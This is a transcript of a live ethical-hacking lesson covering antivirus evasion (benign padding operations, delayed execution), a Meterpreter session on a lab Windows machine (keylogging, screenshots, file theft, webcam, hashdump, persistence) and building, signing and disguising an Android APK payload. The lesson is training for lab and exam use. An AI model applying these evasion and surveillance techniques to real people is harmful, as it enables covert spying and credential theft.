So basically, you have to code differently for bypassing the security. Secondly, behavior. You have to change the behavior of your malware. For example, let's say you want to create a malware to take a screenshot of your victim machine. Okay, let's say to take a screenshot of the victim machine. Now you cannot change this behavior because this is your purpose here. Okay, your purpose is to take the screenshot of your victim machine and mail mail it. Okay, on your mail ID. This you want to perform. Now you cannot change this behavior because this is a purpose. This is a least purpose. So what you can
Okay.
do, you can add some more other operations on top of your malware. For example, opening any file, some simple operation which are not malicious. Opening any
Mm-hmm.
file, or let's say uh, printing something, or just displaying something, or whatever. Means you have to perform the operations. Okay, so this one is a malicious operation here, but you cannot avoid it, you cannot remove it, because this is the purpose of your malware. So what you can do, at top of this malware, you can add the operation which are not malicious. This you can do it, and this is how you can bypass your malware. This is only the technique which you can bypass it. So if you want to create your own malware with the help of any language, you can use Python, you can use C, C++, you can use any language. Make
Mm-hmm.
sure to code differently. And second, to add some other operation which are not malicious on top of your malware. Okay, which means, let's say you created a malware, and that malware, the purpose of that malware to take the shell of the Windows machine. And before taking the shell of a Windows machine, you sleep your malware for 10 days. Okay,
Mm-hmm.
means when entering in the Windows machine, your malware sleep for 10 days automatically. And after 10 days, the malware will automatically trigger. Okay, so this operation you can perform, this can bypass your antivirus. Because when your antivirus check your file, your antivirus knows that your malware is doing nothing. Okay, your file is doing nothing. It is like just sleeping. So that in that case, you can bypass the antivirus.
Okay.
Okay. So these are some ways which you can use for bypassing the malwares. Is it clear?
Yeah,
And
yeah,
there's only one way for bypassing the security, which is create your own malware. Otherwise, you will not going to get any malware on the internet or on dark web which can bypass the full security.
okay.
Okay. Now what we can do, we have turned off the security here. We can simply, so when I double click on this malware, you will notice a shell here. Okay, a connection here. So when I double click on it, so first it will give you the warning that it is like malicious. So click on more info here and click on run anyway. And now your malware is executing in your Windows. But here you will notice a metapleter shell, which means you have fully gain access in the Windows machine. After gaining access, what kind of operation we can perform here? You can see metapleter session 1 open. So if I type help here, you can notice. We can perform many operations here on the Windows machine. For example, here you can see first operation we can perform the core commands. Like here we can run any command here, we can kill any process of the Windows machine. Okay, so these are some like the commands which we can perform on the Windows
Yeah.
machine. Okay, like we can
Mm-hmm.
sleep the process here. These are the commands which we can perform. You can perform as per your session. You can kill your session. You can restart your session. You can run your session in the background and so on.
Yeah.
Main commands start from here, which is file system commands. Okay, these are the commands which you can run on Windows machines. Like you can read any file, you can change the directory, you can delete anything, you can copy anything, you can list the directories, you can download anything, you can upload anything, you can copy, paste, etc. Then networking commands, you can perform networking, you can apply ERP, you can check the ERP cage, you can get proxy information, you can get networking information, etc. Then system commands, you can clear the event logs here. You can clear the logs. You can kill any process here. You can get environment variables here. You can shut down the system. You can restart the system, etc.
Yeah.
You can kill any process and so on. You can suspend any process. You can get the system information, etc. For example, I can get sysinfo here. Now this is the information of my Windows machine, my Windows host name, my Windows 10 here, architecture, system language, and so on. And how many users are there on my Windows? 2 users. Okay. Then you can also perform user interface commands. Like you can capture the keystrokes of the Windows machine. Like whatever your victim is typing, you can capture that. You can capture the mouse. You can capture the screenshot. You can capture the screen. Okay, you can set this meet operator on like set this connection on the startup. Okay, so whenever the Windows start, your connection will automatically restart. Then
Okay.
webcam, you can access the web camera of your victim machine. You can record the mic of your victim machine, etc. Then you
Okay.
can play any audio. You can get another system information, and you can get the passwords of your Windows machine, because your passwords of the Windows machine are stored in the Windows only, in the same folder, in the same database or folder. So you can get the passwords of the Windows machine with the help of hash dump here. Okay, and then so on. You can manipulate the times of your files, etc. So here, first we will perform this operation, which is key scan. Start. So what you can do, you can start, you can write here key scan underscore start here.
Yeah.
So when you click on enter, you can see key scan is started. Now let's say this is my Windows machine and I am the victim here. Let's say I want to write anything. Let's say I'm writing something, any password, any username, I'm chatting with someone. So whatever I'm typing here, let's say hello. Uh, whatever I can type anything. Like Python is the important language. Whatever I'm typing. So whatever I'm typing here or anywhere on the Windows machine, on the browser, on the chatting app, or wherever I'm typing, that is all recorded in my Linux machine. How I can get it? You can type keyscan underscore dump here. So see, whatever I have typed, hello, this is enter here, CR means enter, Python,
Okay.
backscape is the important language, enter, cyber, right shift. Okay, so this I have typed here. So whatever you are typing in your Windows machine, that is all captured in the Linux machine. Okay, and it is like keep on running. If you want to stop it, you can write keyscan underscore stop. Even you can take the screenshot. For example, this is my Windows machine, right?
Yeah.
This one is my Windows machine. So I can write here screen shot here. So when I click on enter, this will the Kali machine will take the screenshot of my Windows machine and enter. Okay. Now you can notice the screenshot saved on this particular location. So if I open this home Kali PS, home Kali here. The name of my file is PS. Okay. PS, this one. If I open this file, you can see this is the current screenshot of my Windows machine. Okay, you can see the time here, and this is the current screenshot. So you can take as many screenshot you want. You can also share the screen, like you can use share screen share. So whatever the Windows machine, whatever the user is doing, that will all presented in your system. Okay, in your Kali machine. More as you can do any number of operation. Like for example, you can move to any directory. Where are we? We are inside downloads. So we can move on, let's say desktop here. On desktop, I have files here. These files. Let's say I want to download this file, hello.py. Okay. So how can I download any file from Windows to Linux? So I can simply type here download, file name hello.py, download or get, yeah, download. You can see the file has been downloaded successfully. If I open this file in my Linux, so you can see here, it is inside. Yeah, you can see hello.py. Okay, you can see hello.py. So this is the file I have downloaded from the Windows machine to my Linux machine. Same as I can upload any file from my Linux machine to the Windows machine. For example, I want to upload this file 9545.c to my Linux machine, to my Windows machine. So you can use here upload, name of your file you want to upload here. Let's say 9545.c to Windows machine, and you can mention the location. Okay. So here you can see 9545.c. Here's the file is. So you can upload any file, you can download any file, you can do any number of operation. Okay, like any number of operation possible here. So these are the commands here. Like you can record mic, You can start the video camera of your target machine. You can see him or her, whatever they are doing here. Okay, and you can kill any process, like you can get UID, which you can get UID here. Okay, so this is my UID here, server username, which is my name here, and so on. Okay, you can move to any location. Okay, now I'm set C here. Now I can perform any operation here, dir. So these are the directories and files inside my C location. So I can move inside Python, any folder there. I can get any information, any piece of data from my Windows machine. Okay. Is it clear how we hacked this machine?
Yeah, that's fine.
Okay. And after completing your practice, you have to exit from here first. Okay, it is compulsory. Exit from here and then open your Windows machine. Delete your malware. That is important.
Okay.
Delete, and then after deleting, empty your recycle bin, and then simply turn on your antivirus. Okay. So this is how you can restore your settings back. And then, okay. So this is how we can hack the Windows machine. Tomorrow or day after, sorry, in the next session, we will hack the Android machine. Okay, like how we can hack Android. Basically, the process is same only in the Android. The difference here is the same process is there. The difference here is instead of creating the malware for the Windows, you have to create malware for the Android.
Okay.
Like this. Everything is same. You have to create malware for Android, meet operator, this one. Your LOst here, your local IP, which is your Kali IP, your Kali port here, any port you can use. ARM is raw here. Okay, and then APK. Because in the Android, you can only run APK file, right? So that is APK, and then you can click on enter. So this will create the malware for your Android. Then the same process, share your malware to the location of your server. Okay, in this location, and then open your MSF console, prepare it. Okay, the same process you have to follow. You have to use multi-handler. Let me show you the steps. Android hacking. Yeah. Okay, so these are the process. First, you have to you have to apply this command, which is meet operator here. Okay, your localhost IP and your local port IP, and then your name of your malware. Then you have to sign your malware. Basically, signing means see for the Android application, if you want to if you are installing any Android application, the Play Store first verify that application. After verification, then the Play Store allow you to install any application. Okay, if your application is not signed, then your Play Store will block your application. Okay, so this is why we have to sign your application, sign your APK. So for signing your malware, for your APK malware, which is this one, you have to follow these commands. First, you have to install this particular application. Okay, if it install JTK here. And then you have to install this zip align. After installing these application, you have to apply for installing the jar signer, you have to install, you have to apply this apt install. And for zip align, you have to apply apt-get install zip align. Then you have to apply these commands. First command is this one. Okay. So just copy or paste your command and make sure to change your name here. For example, here the malware name is androidshell.apk. Okay, make sure to change your name of your malware, whatever you are keeping, you can change it here. First apply this command, then this one, and then this one, and then this one. So while running these 4 commands, you are signing your application, your APK. So this will not able to bypass the security, but yeah, this will look less suspicious. Your file will look less suspicious there. Okay, so let me show you how you can do this operation. So first, the malware is created here. Then you have to install this file, this application. Okay, which is apt install.
Mm-hmm.
Then you have to install the zip align. Okay, and then now, oops. Name of my malware is game.apk. Okay, so the name of my malware is game.apk. So I will copy this command, which is key tool. So I will copy this one and I will paste here and click on enter here. So this application will create a key for me. Now here you have to enter the password of your key. So let's say my password is 12345.
Mm-hmm.
Okay, 123456. So you have to remember this password. This is very important. Okay, you have to remember this password. So after
Okay.
this one, you have to copy this command, which is second one, jar signer, and paste here. And here you have to change your name of your APK file. So in my case, it is game.apk. Name of my malware is game.apk. And enter here. Now what is the password? 123456. So this will create a jar site. Okay, a certification for your application. Okay. And you can see your name as well. Then here you have to sign your or verify your certificate again. So here you have to paste here and then change your name of your APK, which is game, not APK in my case. So this will like sign your malware. Okay. Then after signing, so this is providing some error here. Okay. So that you can ignore here. Okay. And then you have to apply this command, which is zip align. Means you are just merging your certificate with your Android APK or your malware. So that you can
Yeah.
paste, and here you can simply change your malware name. Just game.apk. Okay, and when I click on ls here, so our application, which is game.apk, yeah, here it is signed. After signing your malware, then again copy your malware, which is game.apk, in that particular location, which is where www.html. Also make sure to open your Apache server. Okay. Then you have to move the file in the server location. You have to start your Apache and then move your APK file to this location. And then you have to start the NSF console, start the multi-handler, use, show options, set your LOs, your L port, your payload.
Mm-hmm.
So these are the same commands which we have applied in the Windows hacking. And then show options and then run here. Okay, make sure to change your Android here. Instead of Windows, you have this Android here. And then when
Okay.
you open your Android, open the Android, okay, your device, open the browser, let's say Chrome browser you're opening. Then inside your Chrome browser, you have to mention this URL. Okay, URL,
Okay.
your IP address of your Kali machine, slash a name of your malware here. And when you click
Mm-hmm.
on enter, like when you click on search, your APK will automatically installed. Okay.
Okay.
Then you have
Yep.
to, sorry, download. Then you have to click on install. And when you click on install, again, you will have some warning. Ignore that. Just keep on installing. And after you install your malware, you will get the shell here. And with the help of Android, what you can do? You can do again any number of operations. You can get the contacts detail. Once you can get the contact details of the user. You can open camera. You can do any number of operations. You can get messages of the user. You can get the WhatsApp chat. You can access the entire Android of that person with your
Mm-hmm.
commands. Okay, like you can access any kind of file. You can download any file. You can upload any file, etc. That you can perform any operation.
Mm-hmm.
Okay, so the same operation you have to perform in the Android. The difference is you have to sign your Android. Okay. And second, just change your name, Android, Windows to Android here, and then APK file. And rest, the steps are same only. Okay. Is it clear?
Yeah, that is fine.
Again, for the Android hacking, this malware will not work in the real life scenario because this will not able to bypass the security of your Android. because the
Mhm.
current version of Android is, I think, 15 or 16. So that will not, this malware will not able to bypass that. So if you want to create your own malware, like bypass the security, then you can create your own malware.
Okay.
Okay. Is it clear this much?
Yeah, that's fine.
The same method we are following in the Android, which is like gaining the reverse connection, which means your Android will share the connection request to your Windows. And make
Okay.
sure your Android, you are hacking, and your Windows machine or your Kali machine, they are on the same network. Same as your Windows machine and your Kali machine. They should be on the same network. Then you will apply this attack. Then this attack will work. Otherwise, this attack will not work. If your machine is on the different networks.
Mhm.
Okay.
Yep.
And for hacking the machine, Windows machine on the different network, then you have to perform, like you have to set up your Wi-Fi. Okay, like you have to set up the Wi-Fi so that whatever the connections are coming from the outside, that is only came in your device. In that case, you can hack the outsider machine also. Okay.
Okay.
But for the examination, you will get the machines on the same network only. The machine, your Windows machine and your Kali machine, they will be on the same network, and then you can easily hack those machines. And in the
Okay.
examination, you will get Windows 7.
Mhm.
Okay.
Yeah. Mhm.
Is it clear? Any
Yeah,
question you want to ask?
for now it's fine.
Okay. So this is how you can hack Windows machine and Android and Metasploit way. For the
Yeah.
assignment, what you can do in this week, you can try this one. You can search for Q Patrick's level 1 down
Okay.
and click on this first URL, which is #1.
Mhm.
Okay, you have to install this machine, which is with mirror image. Click on this mirror image.
Yeah.
Okay. Now you have to download this machine and you have to open your VMware. This is a zip file. So
Yeah.
unzip this file, open your VMware. Simply
Mhm.
click on file, click on open
Yeah.
and open your machine. Okay.
Yeah.
So this
Mhm.
is same as opening your Metasploitable machine. The steps are same. And once you
Okay.
open the machine, again, click on the settings and let me click on the settings of your QPatrick's machine and
Yeah.
click on the network adapter and click on bridge. Make sure
Bridge.
your Kali machine and your QPatrick's machine, they should be on the same network.
Okay.
And then you
Yeah.
have to hack this machine.
Mhm.
Okay. You can see the challenge here, which is this machine is a like easy one. The object
Mhm.
is to acquire root access. Okay, like root access you have
Mhm.
to acquire by any means possible. Okay,
Okay.
and the purpose is to learn the basic tools and so on. If you want to see the walkthroughs, like if you stuck somewhere, then you can see the walkthrough here. You can right click here and you can open the walkthroughs.
Yeah.
Okay. No side dish, but okay. So this is a walkthrough of the Cubeatrix machine, like how you're going to hack. So this is the last
Okay.
option. You can try it. Okay, first try it by yourself. Start with the
Mhm.
scanning your IP address of a target machine. Then apply the
Yep.
Nmap scan. Check out the open ports. Check out if any port is vulnerable or not. If the port
Mhm.
is vulnerable, then simply like gain access through the open ports. Okay,
Okay. Yeah. Yeah.
you can perform. Is it clear?
Mhm. Yeah. Yeah. That's fine.
So
That's
this one is your like you can do this in this week. Okay.
Mhm.
And once you are comfortable with the level 1, then we will hack level 2 of Cubeatrix, which is our advanced level machine. Okay.
Okay. Yeah.
Cubeatrix
Yeah.
level 1
Okay.
is like one step forward with the Metasploitable machine. Okay.
Mhm. Yeah.
Metasploitable, first try to hack Metasploitable, then Windows, and then Android, and then hack the Cubeatrix. Okay.
Okay. Okay. Yeah. Okay. Then.
So any other questions for now?
For now, that's fine. No.
Okay. So rest, we will continue in the next week.
Okay. Cool.
Okay. I
Yeah.
will share the recorded session and the notes file.
Okay, cool. Thank
Thank
you.
you.
Thank you. Bye.